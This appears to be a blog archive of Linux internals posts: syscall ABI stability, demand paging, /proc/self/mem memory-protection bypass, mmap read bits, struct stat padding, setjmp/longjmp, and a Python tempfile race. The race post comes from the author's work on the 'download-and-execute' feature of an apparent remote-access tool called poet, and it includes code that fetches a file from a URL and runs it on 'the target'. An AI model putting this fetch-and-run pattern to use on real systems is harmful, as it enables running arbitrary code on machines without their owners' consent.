Category Archives: Linux

Syscall ABI compatibility: Linux vs Windows/macOS

The Linux kernel has an interesting difference compared to the Windows and macOS kernels: it offers syscall ABI compatibility.

This means that applications that program directly against the raw syscall interface are more or less guaranteed to always keep working, even with arbitrarily newer kernel versions. “Programming against the raw syscall interface” means including assembly code in your app that triggers syscalls:

  • setting the appropriate syscall number in the syscall register
  • setting arguments in the defined argument registers
  • executing a syscall instruction
  • reading the syscall return value register

Here are the ABIs for some common architectures.

Architecture   Syscall Number Register   Syscall Arguments             Syscall Return Value
x86_64         RAX                       RDI, RSI, RDX, R10, R8, R9    RAX
Manticore is my go-to source for quickly looking these up.

Once you’ve done this, you’re relying on the kernel to not change any part of it. If the kernel changes any of these registers, or changes the syscall number mapping, your app will no longer trigger the desired syscall correctly and will break.
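As a rough illustration (not from the original post), here is a Python sketch that invokes getpid by its raw number. It goes through libc's generic syscall() wrapper via ctypes rather than inline assembly, so it only approximates programming against the raw interface, but it does bake a syscall number into the program. The SYS_GETPID table and the raw_getpid name are made up for this example, and it assumes Linux on x86_64 or aarch64.

```python
import ctypes
import os
import platform

# getpid syscall numbers per architecture (Linux only). These are the kind of
# values the kernel promises never to change.
SYS_GETPID = {"x86_64": 39, "aarch64": 172}


def raw_getpid():
    """Call getpid by number through libc's generic syscall() wrapper."""
    number = SYS_GETPID[platform.machine()]
    libc = ctypes.CDLL(None, use_errno=True)  # symbols of the running process
    libc.syscall.restype = ctypes.c_long
    return libc.syscall(ctypes.c_long(number))


if __name__ == "__main__":
    # Both values should match: one hard-codes the number, one asks libc.
    print(raw_getpid(), os.getpid())
```

If the kernel ever renumbered getpid, the hard-coded number would silently invoke something else, which is exactly the breakage the ABI guarantee rules out.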

Aside from writing raw assembly in your app, there’s a more innocuous way of accidentally “programming directly against the syscall interface”: statically linking to libc. When you statically link to a library, that library’s code is directly included in your binary. libc is generally the system component responsible for implementing the assembly to trigger syscalls, and by statically linking to it, you effectively inline those assembly instructions directly into your application.

So why does Linux offer this and Windows and macOS don’t?

In general, compatibility is cumbersome. As a developer, if you can avoid having to maintain compatibility, it’s better. You have more freedom to change, improve, and refactor in the future. So by default it’s preferable to not maintain compatibility — including for kernel development.

Windows and macOS are able to not offer compatibility because they control the libc for their platforms and the rules for using it. One of those rules is “you are not allowed to statically link libc”, for the exact reason that static linking would encourage apps that depend directly on the syscall ABI, hindering the kernel developers’ ability to freely change the kernel’s implementation.

If all app developers are forced to dynamically link against libc, then as long as kernel developers also update libc with the corresponding changes to the syscall ABI, everything works. Old apps run on a new kernel will dynamically link against the new libc, which properly implements the new ABI. Compatibility is of course still maintained at the app/libc level — just not at the libc/kernel level.

Linux doesn’t control the libc in the same way Windows and macOS do because in the Linux world, there is a distinct separation between kernel and userspace that isn’t present in commercial operating systems. Strictly speaking Linux is just the kernel, and you’re free to run whatever userspace on top. Most people run GNU userspace components (glibc), but alternatives are not unheard of (musl libc, also bionic libc on Android).

So because Linux kernel developers can’t 100% control the libc that resides on the other end of the syscall interface, they bite the bullet and retain ABI compatibility. This technically allows you to statically link with more confidence than on other OSs. That said, there are other reasons why you shouldn’t statically link libc, even on Linux.


This directory documents the interfaces that the developer has
defined to be stable.  Userspace programs are free to use these
interfaces with no restrictions, and backward compatibility for
them will be guaranteed for at least 2 years.  Most interfaces
(like syscalls) are expected to never change and always be

kernel docs

What:		The kernel syscall interface
	This interface matches much of the POSIX interface and is based
	on it and other Unix based interfaces.  It will only be added to
	over time, and not have things removed from it.

	Note that this interface is different for every architecture
	that Linux supports.  Please see the architecture-specific
	documentation for details on the syscall numbers that are to be
	mapped to each syscall.

apple developer docs

Q:  I'm trying to link my binary statically, but it's failing to link because it can't find crt0.o. Why?
A: Before discussing this issue, it's important to be clear about terminology:

A static library is a library of code that can be linked into a binary that will, eventually, be dynamically linked to the system libraries and frameworks.
A statically linked binary is one that does not import system libraries and frameworks dynamically, but instead makes direct system calls into the kernel.
Apple fully supports static libraries; if you want to create one, just start with the appropriate Xcode project or target template.

Apple does not support statically linked binaries on Mac OS X. A statically linked binary assumes binary compatibility at the kernel system call interface, and we do not make any guarantees on that front. Rather, we strive to ensure binary compatibility in each dynamically linked system library and framework.

If your project absolutely must create a statically linked binary, you can get the Csu (C startup) module from Darwin and try building crt0.o for yourself. Obviously, we won't support such an endeavor.


  • Solaris also stopped supporting static linking against libc.

What they don’t tell you about demand paging in school

This post details my adventures with the Linux virtual memory subsystem, and my discovery of a creative way to taunt the OOM (out of memory) killer by accumulating memory in the kernel, rather than in userspace.

Keep reading and you’ll learn:

  • Internal details of the Linux kernel’s demand paging implementation
  • How to exploit virtual memory to implement highly efficient sparse data structures
  • What page tables are and how to calculate the memory overhead incurred by them
  • A cute way to get killed by the OOM killer while appearing to consume very little memory (great for parties)
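As a back-of-the-envelope sketch of the page table arithmetic (my assumptions, not numbers taken from the post): x86_64 with 4 KiB pages, 4-level paging, and 8-byte entries, so each 4 KiB table holds 512 entries. The function name page_table_overhead is hypothetical, and the mapping is assumed to be contiguous and aligned.

```python
PAGE_SIZE = 4096         # bytes per page, and per page table
ENTRIES_PER_TABLE = 512  # 4096-byte table / 8-byte entries


def page_table_overhead(mapped_bytes, levels=4):
    """Bytes of page tables needed to map a contiguous, aligned region."""
    tables = 0
    units = -(-mapped_bytes // PAGE_SIZE)       # pages to map (ceil division)
    for _ in range(levels):
        units = -(-units // ENTRIES_PER_TABLE)  # tables needed at this level
        tables += units
    return tables * PAGE_SIZE


if __name__ == "__main__":
    print(page_table_overhead(1 << 30))  # page table cost of mapping 1 GiB
```

Under these assumptions, a fully mapped 1 GiB region needs 515 tables, about 2 MiB. Touching just one page in every 2 MiB of that region needs the same 515 tables while only 512 data pages (2 MiB) become resident, so the kernel-side bookkeeping ends up roughly as large as the userspace data.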

Note: Victor Michel wrote a great follow up to this post here.


You can use /proc/*/mem to bypass memory protections

Filmed some screencasts today explaining some interesting behavior with /proc/self/mem — you can use it to write to unwritable memory (including the text of libc!).
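A minimal sketch of the idea, assuming Linux with a writable /proc/self/mem (some sandboxes restrict it). It is not the code from the screencasts: it maps a fresh read-only anonymous page through libc's mmap via ctypes instead of touching libc's text, and the function name write_through_proc_mem is made up for this example.

```python
import ctypes
import mmap
import os


def write_through_proc_mem(data=b"hi"):
    """Map a read-only page, then write to it through /proc/self/mem."""
    libc = ctypes.CDLL(None, use_errno=True)
    libc.mmap.restype = ctypes.c_void_p
    libc.mmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int,
                          ctypes.c_int, ctypes.c_int, ctypes.c_long]
    libc.munmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t]

    addr = libc.mmap(None, mmap.PAGESIZE, mmap.PROT_READ,
                     mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS, -1, 0)
    if addr is None or addr == ctypes.c_void_p(-1).value:
        raise OSError(ctypes.get_errno(), "mmap failed")

    # A normal store to addr would fault, since the page lacks PROT_WRITE.
    # The file offset in /proc/self/mem is the virtual address to write to.
    fd = os.open("/proc/self/mem", os.O_RDWR)
    try:
        os.pwrite(fd, data, addr)
    finally:
        os.close(fd)

    result = ctypes.string_at(addr, len(data))  # read the page back directly
    libc.munmap(addr, mmap.PAGESIZE)
    return result


if __name__ == "__main__":
    print(write_through_proc_mem())
```

The mapping is never made writable from userspace's point of view; the write succeeds because the kernel performs it on the process's behalf.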

Read bits are not enforced for memory mappings

Filmed a screencast exploring some neat mmap behavior — read bits are not enforced for memory mappings. This is because the underlying x86 page table entries have a single bit to toggle between “Read” and “Read/Write”.
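A small sketch of that behavior, assuming Linux on x86 (other architectures may behave differently). It requests a mapping with only PROT_WRITE and then reads from it anyway; the function name read_write_only_mapping is made up for this example.

```python
import mmap


def read_write_only_mapping():
    """Map a page without PROT_READ, write to it, then read it back."""
    m = mmap.mmap(-1, mmap.PAGESIZE,
                  flags=mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS,
                  prot=mmap.PROT_WRITE)  # note: no PROT_READ requested
    try:
        m[0:5] = b"hello"
        return m[0:5]  # the read goes through even though PROT_READ was not set
    finally:
        m.close()


if __name__ == "__main__":
    print(read_write_only_mapping())
```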

Being pedantic about C++ compilation


  • Don’t assume it’s safe to use pre-built dependencies when compiling C++ programs. You might want to build from source, especially if you can’t determine how a pre-built object was compiled, or if you want to use a different C++ standard than was used to compile it.
  • Ubuntu has public build logs which can help you determine if you can use a pre-built object, or if you should compile from source.
  • pkg-config is useful for generating the flags needed to compile a complex third-party dependency. CMake’s PkgConfig module can make it easy to integrate a dep into your build system.
  • Use CMake IMPORTED targets (e.g. BZip2::BZip2) rather than legacy variables (e.g. BZIP2_INCLUDE_DIRS and BZIP2_LIBRARIES).

struct stat notes

struct stat on Linux is pretty interesting

  • the struct definition in the man page is not exactly accurate
  • glibc explicitly pads the struct with unused members, which is interesting. I guess to reserve space for expansion of fields
    • if you want to see the real definition, a trick you can use is writing a test program that uses a struct stat, and compiling with -E to stop after preprocessing then look in that output for the definition
  • you can look in the glibc sources and the linux sources and see that they actually have to make their struct definitions match! (i think). since kernel space is populating the struct memory and userspace is using it, they need to exactly agree on where each member is
    • you can find some snarky comments in linux about the padding, which is pretty funny. for example (arch/arm/include/uapi/asm/stat.h)
  • because the structs are explicitly padded, if you initialize a struct stat with an initializer list, you CANNOT omit the designators. if you do, the values are assigned positionally, in declaration order, and land in the padding members instead of the fields you wanted!
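The positional-initialization pitfall can be mimicked in Python with ctypes, whose Structure constructor also fills fields in declaration order. This is only an analogy to the C behavior: PaddedStat is a hypothetical layout, not the real struct stat, and pad1 stands in for a reserved padding member.

```python
import ctypes


class PaddedStat(ctypes.Structure):
    """Hypothetical struct with an explicit padding member between fields."""
    _fields_ = [
        ("st_dev", ctypes.c_ulong),
        ("pad1", ctypes.c_ushort),  # reserved padding, not meant to be set
        ("st_ino", ctypes.c_ulong),
        ("st_mode", ctypes.c_uint),
    ]


# Positional values are assigned in declaration order, so the second value
# lands in pad1 and everything after it shifts by one field.
positional = PaddedStat(1, 2, 0o644)

# Naming the fields (the analogue of C designators) skips the padding.
designated = PaddedStat(st_dev=1, st_ino=2, st_mode=0o644)

if __name__ == "__main__":
    print(positional.pad1, positional.st_ino, positional.st_mode)
    print(designated.pad1, designated.st_ino, designated.st_mode)
```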

How setjmp and longjmp work

Pretty recently I learned about setjmp() and longjmp(). They’re a neat pair of libc functions which allow you to save your program’s current execution context and resume it at an arbitrary point in the future (with some caveats). If you’re wondering why this is particularly useful, to quote the manpage, one of their main use cases is “…for dealing with errors and interrupts encountered in a low-level subroutine of a program.” These functions can be used for more sophisticated error handling than simple error code return values.

I was curious how these functions worked, so I decided to take a look at musl libc’s implementation for x86. First, I’ll explain their interfaces and show an example usage program. Next, since this post isn’t aimed at the assembly wizard, I’ll cover some basics of x86 and Linux calling convention to provide some required background knowledge. Lastly, I’ll walk through the source, line by line.


Off to the (Python Internals) Races

This post is about an interesting race condition I ran into a while ago while working on a small feature improvement for poet.

In particular, I was improving the download-and-execute capability of poet which, if you couldn’t tell, downloads a file from the internet and executes it on the target. At the original time of writing, I didn’t know about the python tempfile module and since I recently learned about it, I wanted to integrate it into poet as it would be a significant improvement to the original implementation. The initial patch looked like this.

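import os, stat, tempfile, urllib2
import subprocess as sp

r = urllib2.urlopen(inp.split()[1])
with tempfile.NamedTemporaryFile() as f:
    f.write(r.read())  # save the downloaded payload to the temp file
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()  # ensure that file was actually written to disk
    sp.Popen([f.name], stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)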

This code downloads a file from the internet, writes it to a tempfile on disk, sets the permissions to executable, and executes it in a subprocess. In testing this code, I observed some puzzling behavior: the file was never actually getting executed because it was suddenly ceasing to exist! I noticed, though, that when I waited on the child, for example by calling .wait() on the Popen(), it would work fine. However, I intentionally didn’t want the client to block while the file executed its arbitrary payload, so waiting wasn’t an option.

The fact that the execution would work when the Popen call waited for the process and didn’t work otherwise suggests that there was something going on between the time it took to execute the child and the time it took for the with block to end and delete the file, which is tempfile’s default behavior. More specifically, the file must have been deleted at some point before the exec syscall loaded the file from disk into memory. Let’s take a look at the implementation of subprocess.Popen() to see if we can gain some more insight:

def _execute_child(self, args, executable, preexec_fn, close_fds,
                   cwd, env, universal_newlines,
                   startupinfo, creationflags, shell, to_close,
                   p2cread, p2cwrite,
                   c2pread, c2pwrite,
                   errread, errwrite):
    """Execute program (POSIX version)"""

    # ... (argument handling and creation of the errpipe_read /
    #      errpipe_write pipe elided)

    try:
        gc_was_enabled = gc.isenabled()
        gc.disable()
        try:
            self.pid = os.fork()
        except:
            if gc_was_enabled:
                gc.enable()
            raise
        self._child_created = True
        if self.pid == 0:
            # Child
            try:
                # Close parent's pipe ends
                if p2cwrite is not None:
                    os.close(p2cwrite)
                if c2pread is not None:
                    os.close(c2pread)
                if errread is not None:
                    os.close(errread)
                os.close(errpipe_read)

                # When duping fds, if there arises a situation
                # where one of the fds is either 0, 1 or 2, it
                # is possible that it is overwritten (#12607).
                if c2pwrite == 0:
                    c2pwrite = os.dup(c2pwrite)
                if errwrite == 0 or errwrite == 1:
                    errwrite = os.dup(errwrite)

                # Dup fds for child
                def _dup2(a, b):
                    # dup2() removes the CLOEXEC flag but
                    # we must do it ourselves if dup2()
                    # would be a no-op (issue #10806).
                    if a == b:
                        self._set_cloexec_flag(a, False)
                    elif a is not None:
                        os.dup2(a, b)
                _dup2(p2cread, 0)
                _dup2(c2pwrite, 1)
                _dup2(errwrite, 2)

                # Close pipe fds.  Make sure we don't close the
                # same fd more than once, or standard fds.
                closed = { None }
                for fd in [p2cread, c2pwrite, errwrite]:
                    if fd not in closed and fd > 2:
                        os.close(fd)
                        closed.add(fd)

                if cwd is not None:
                    os.chdir(cwd)

                if preexec_fn:
                    preexec_fn()

                # Close all other fds, if asked for - after
                # preexec_fn(), which may open FDs.
                if close_fds:
                    self._close_fds(but=errpipe_write)

                if env is None:
                    os.execvp(executable, args)
                else:
                    os.execvpe(executable, args, env)

            except:
                exc_type, exc_value, tb = sys.exc_info()
                # Save the traceback and attach it to the exception object
                exc_lines = traceback.format_exception(exc_type,
                                                       exc_value,
                                                       tb)
                exc_value.child_traceback = ''.join(exc_lines)
                os.write(errpipe_write, pickle.dumps(exc_value))

            # This exitcode won't be reported to applications, so it
            # really doesn't matter what we return.
            os._exit(255)

        # Parent
        if gc_was_enabled:
            gc.enable()
    finally:
        # be sure the FD is closed no matter what
        os.close(errpipe_write)

    # Wait for exec to fail or succeed; possibly raising exception
    # Exception limited to 1M
    data = _eintr_retry_call(os.read, errpipe_read, 1048576)
    # ... (remaining parent-side cleanup and error handling elided)


The _execute_child() function is called by the subprocess.Popen class constructor and implements child process execution. There’s a lot of code here, but the key parts to notice are the os.fork() call, which creates the child process, and the relative lengths of the branches that follow. The if self.pid == 0 block contains the code for executing the child process and is significantly more involved than the code for handling the parent process.

From this, we can deduce that when the subprocess.Popen() call executes in my code, after forking, while the child is preparing to call os.execve, the parent simply returns, and immediately exits the with block. This automatically invokes the f.close() function which deletes the temp file. By the time the child calls os.execve, the file has been deleted on disk. Oops.

I fixed this by adding the delete=False argument to the NamedTemporaryFile constructor to suppress the auto-delete functionality. Of course this means that the downloaded files will have to be cleaned up manually, but this allows the client to not block when executing the file and have the code still be pretty clean.
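A minimal Python 3 sketch of that fix, not poet's actual code: the launch_payload name and the inline shell-script payload are stand-ins for the real download. One deliberate difference from the patch above is that the Popen call sits after the with block, so the file is already closed when the child execs it; on Linux, exec'ing a file that is still open for writing can fail with ETXTBSY ("Text file busy").

```python
import os
import stat
import subprocess as sp
import tempfile


def launch_payload(payload):
    """Write payload to a temp file that outlives the with block, then run it
    without waiting for it to finish."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(payload)
        os.fchmod(f.fileno(), stat.S_IRWXU)
    # Leaving the with block closed the file but, because of delete=False,
    # did not remove it, so the child can exec it whenever it gets there.
    proc = sp.Popen([f.name], stdout=sp.DEVNULL, stderr=sp.STDOUT)
    return proc, f.name


if __name__ == "__main__":
    proc, path = launch_payload(b"#!/bin/sh\nexit 7\n")
    print(proc.wait())  # waiting here only so the demo can clean up safely
    os.unlink(path)     # manual cleanup is now the caller's job
```

The caller gets the path back precisely because nothing will delete the file automatically anymore.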

Main takeaway here: don’t try to Popen a NamedTemporaryFile as the last statement in the tempfile’s with block.